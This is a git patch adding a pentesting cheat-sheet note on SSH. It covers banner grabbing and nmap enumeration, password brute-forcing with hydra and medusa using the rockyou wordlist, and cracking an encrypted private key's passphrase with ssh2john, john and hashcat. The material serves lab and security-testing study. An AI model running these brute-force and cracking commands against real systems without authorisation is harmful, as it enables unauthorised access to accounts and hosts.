From b4b755b608ab215927d0c6b374bd24ba3d334b41 Mon Sep 17 00:00:00 2001 From: Hadi Date: Mon, 4 May 2026 14:15:59 +0200 Subject: [PATCH] Init ssh Signed-off-by: Hadi --- src/content/notes/network/ssh.md | 75 ++++++++++++++++++++++++++++++++ 1 file changed, 75 insertions(+) create mode 100644 src/content/notes/network/ssh.md diff --git a/src/content/notes/network/ssh.md b/src/content/notes/network/ssh.md new file mode 100644 index 0000000..96e7d50 --- /dev/null +++ b/src/content/notes/network/ssh.md @@ -0,0 +1,75 @@ +--- +title: "SSH" +description: "Enumeration, exploitation and post-exploitation techniques for SSH servers." +tags: ["ssh", "network", "service"] +publishDate: 2026-05-04 +--- + +## Overview + +SSH runs on **port 22** and provides an encrypted remote shell. +Common implementations: OpenSSH, Dropbear, Bitvise. + +## Enumeration + +### Banner grabbing + +```bash +nc -nv $IP 22 +ssh $IP +``` + +The banner reveals the software and version (e.g. `OpenSSH_9.2`). + +### Nmap + +```bash +nmap -sV -p 22 $IP +nmap -p 22 --script ssh-* $IP +``` + +Key scripts: + +- `ssh-hostkey`: retrieves the server's public key +- `ssh-auth-methods`: lists accepted authentication methods +- `ssh-brute`: brute-force credentials + +## Connect + +```bash +ssh $user@$IP +ssh -p 2222 $user@$IP +ssh -i id_rsa $user@$IP +``` + +## Brute Force + +```bash +hydra -l $user -P ~/wordlists/rockyou.txt ssh://$IP +medusa -h $IP -u $user -P ~/wordlists/rockyou.txt -M ssh +``` + +Only viable if password auth is enabled. Check with: + +```bash +ssh -v $user@$IP +``` + +Look for `publickey,password` in the output. + +## Key-Based Auth + +If you find a private key (`id_rsa`), set permissions and connect: + +```bash +chmod 600 id_rsa +ssh -i id_rsa $user@$IP +``` + +If the key is encrypted, crack the passphrase: + +```bash +ssh2john id_rsa > hash.txt +john hash.txt --wordlist=~/wordlists/rockyou.txt +hashcat -m 22921 hash.txt ~/wordlists/rockyou.txt +```